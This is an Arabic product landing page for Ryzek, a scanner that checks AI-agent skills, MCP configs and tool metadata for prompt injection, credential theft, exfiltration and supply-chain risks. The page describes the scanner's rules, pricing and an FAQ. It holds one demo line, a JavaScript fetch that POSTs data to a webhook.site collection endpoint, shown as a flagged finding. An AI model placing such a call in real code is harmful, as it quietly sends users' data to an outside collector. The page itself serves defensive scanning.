فحص أمني لوكلاء الذكاء الاصطناعي
اعرف ما تفعله المهارة قبل أن يُشغّلها وكيلك.
يقرأ Ryzek المهارات، وإعدادات خوادم MCP، وبيانات الأدوات، ويُشير إلى حقن المُوجِّهات، والتوجيهات المخفية، وسرقة بيانات الاعتماد، والصلاحيات الأوسع من اللازم، والأدوات التي تغيّرت بعد موافقتك عليها. وتأتي كل نتيجة مع درجة ثقة وسبب واضح.
الخطة المجانية: 20 عملية فحص شهريًا مع جميع القواعد. تُقرأ الملفات التي تُفحص في الذاكرة ولا تُخزَّن أبدًا.
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
عثر Ryzek على 1 مشكلة
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
نتائج فحص حقيقية، تم إنشاؤها عند بناء هذه الصفحة.
الإعلان التشويقي
Ryzek في ثمانين ثانية.
ما يُسلَّم للوكلاء بصمت — وما يعرضه لك Ryzek قبل أن يُشغَّل.
كيف يعمل
من الرفع إلى نتيجة يمكنك التصرف بناءً عليها.
دون أي تثبيت. سجّل الدخول، وأضف ملفاتك، واقرأ ما وجده Ryzek وسببه.
-
01 · تسجيل الدخول
إنشاء حساب مجاني
سجّل الدخول بحساب تملكه بالفعل. تنتقل معك حصتك من الفحوصات وسجل أدواتك إلى أي جهاز.
-
02 · إضافة الملفات
أفلت ما يحمّله وكيلك
مجلدات المهارات مع نصوصها البرمجية، وإعدادات MCP، وبيانات الأدوات، و
package.jsonأوrequirements.txt. -
03 · القراءة
احصل على سبب، لا مجرد إشارة
تعرض كل نتيجة خطورتها، ومدى ثقة Ryzek بها، وسببها، والنص الدقيق الذي أدى إلى ظهورها، وفئتها ضمن OWASP.
-
04 · إعادة الفحص
اعرف متى تتغيّر أداة
يحتفظ Ryzek ببصمة لكل أداة — لا بالملف نفسه — كي يتمكن فحص لاحق من إخبارك إذا تغيّر شيء وافقت عليه.
ما الذي يكتشفه
54 قاعدة موزّعة على خمسة أنواع من المخاطر.
لكل قاعدة عرض توضيحي مباشر في صفحة القواعد: الملف، والجزء المهم فيه، وما يُبلّغ عنه الماسح فعليًا.
18 قاعدة · أمان الوكيل
نص موجَّه إلى الذكاء الاصطناعي
حقن المُوجِّهات (prompt injection)، والتوجيهات المخفية في التعليقات أو الأحرف غير المرئية، ونتائج الأدوات المزوّرة، وتسميم الذاكرة.
5 قاعدة · التسريب
مسارات تسريب بياناتك
نقاط تجميع بيانات، ونفق DNS (DNS tunnelling)، ومنارات الصور (image beacons)، وأدوات تجمع بين القراءة الخاصة والكتابة العامة.
7 قاعدة · بيانات الاعتماد
أسرار في المكان الخطأ
مفاتيح مكتوبة مباشرة في الكود، ورموز وصول داخل إعدادات MCP، وقراءات من مخازن بيانات الاعتماد وسجل الأوامر، وطلبات بيانات وصفية سحابية.
13 قاعدة · سلسلة التوريد
من أين جاء الكود
خوادم غير مثبّتة على إصدار محدد ومنتحلة الهوية، وإصدارات معروفة بثغراتها، وخطافات تثبيت، وخوادم خفية، وأدوات تغيّرت بعد الموافقة عليها.
11 قاعدة · التنفيذ
صلاحيات أكبر مما تحتاجه المهمة
صلاحيات أوسع من اللازم، وأدوات تمت الموافقة عليها تلقائيًا، وحالات هروب من البيئة المعزولة (sandbox)، والاستمرارية، وحقن الأوامر.
جميع القواعد
مشاهدة جميع العروض ←
صفِّ حسب الخطورة، واقرأ الشرح المبسّط، وشاهد النتيجة الفعلية لكل قاعدة.
لماذا Ryzek
نتائج يمكنك التحقق منها، من ماسح يوضّح أين يتوقف.
الماسح الذي يُطلق إنذارات كاذبة باستمرار يُتجاهَل، والماسح الذي يبالغ في ادعاءاته يُمنح ثقة لا يستحقها. صُمم Ryzek لتجنّب الأمرين معًا.
اطّلع على ما لا يستطيع Ryzek رؤيته — بما في ذلك السلوك الذي لا يظهر إلا أثناء تشغيل الخادم، وما بداخل البرامج المُصرَّفة (compiled).
- سبب واضح مع كل نتيجة. مدى ثقة القاعدة، ولماذا — بحيث لا تبدو الإشارة ذات الثقة المنخفضة وكأنها هجوم مؤكَّد.
- كشف التغييرات. يُشار إلى أي أداة تتغيّر بصمت بعد موافقتك عليها في فحصك التالي.
- لا يُحتفظ بملفاتك. تُفحص الملفات المرفوعة في الذاكرة ثم تُهمَل. نخزّن عدد الفحوصات وبصمات الأدوات، ولا نخزّن المحتوى أبدًا.
- مرتبطة بـOWASP. تُقابل كل قاعدة فئة ضمن OWASP MCP Top 10.
- كل قاعدة في كل خطة. ستضيف الخطط المدفوعة حجمًا وأتمتة، لا قدرات كشف إضافية.
الأسعار
ابدأ مجانًا. مع جميع القواعد.
تشغّل الخطة المجانية مجموعة القواعد كاملة، مع حد أقصى للحجم. وستُتاح قريبًا خطط مدفوعة بحدود أعلى.
متاح الآن
مجانًا — 0 دولار
20 عملية فحص شهريًا، وجميع القواعد البالغ عددها 54، وكشف التغييرات، وتقارير قابلة للتنزيل.
قريبًا
Pro وPro Plus وTeams
بدءًا من 16 دولارًا شهريًا، مع 300 إلى 1,500 عملية فحص شهريًا. اطّلع على ما تتضمنه واطلب إشعارك عند إتاحتها.
الأسئلة
أسئلة شائعة.
هل تحتفظون بالملفات التي أفحصها؟
لا. تُرسَل الملفات إلى الماسح عبر HTTPS، وتُفحص في الذاكرة، وتُهمَل فور إرجاع النتيجة. ما نخزّنه هو عدد عمليات الفحص التي استخدمتها، وبصمة لكل أداة — قيم تجزئة مع تصنيفات صلاحياتها — كي نتمكن من إخبارك إذا تغيّرت. تجد التفاصيل في سياسة الخصوصية.
لماذا أحتاج إلى حساب؟
بحيث تنتقل حصتك من الفحوصات وسجل أدواتك أينما ذهبت. ولا يعمل كشف التغييرات إلا إذا تذكّر Ryzek شكل الأداة في آخر مرة فحصتها.
ما الملفات التي يمكنني فحصها؟
مجلدات المهارات (ملف SKILL.md مع النصوص البرمجية المرافقة له)، وملفات إعدادات MCP مثل .mcp.json أو claude_desktop_config.json، وبيانات الأدوات بصيغة JSON، وpackage.json أو requirements.txt للكشف عن خطافات التثبيت والتبعيات المعرَّضة للثغرات.
هل تعني النتيجة النظيفة أن المهارة آمنة؟
لا — فهذا يعني فقط أن ما من قاعدة من القواعد البالغ عددها 54 قد تطابقت. يقرأ Ryzek الملفات؛ ولا يُشغّلها، لذا فإن أي سلوك لا يظهر إلا أثناء التشغيل، أو داخل برنامج مُصرَّف (compiled)، يقع خارج نطاق ما يمكنه رؤيته. الفحص النظيف علامة جيدة، لا ضمانًا.
هل يمكنني تشغيله ضمن CI؟
ليس بعد. من المخطط توفير التكامل مع CI ضمن الخطط المدفوعة. إذا كان هذا مهمًا بالنسبة لك، أخبرنا — فذلك يساعدنا على تحديد الأولويات.
افحص المهارات التي يثق بها وكيلك بالفعل.
يستغرق التسجيل وإضافة ملفاتك الأولى دقيقة واحدة فقط.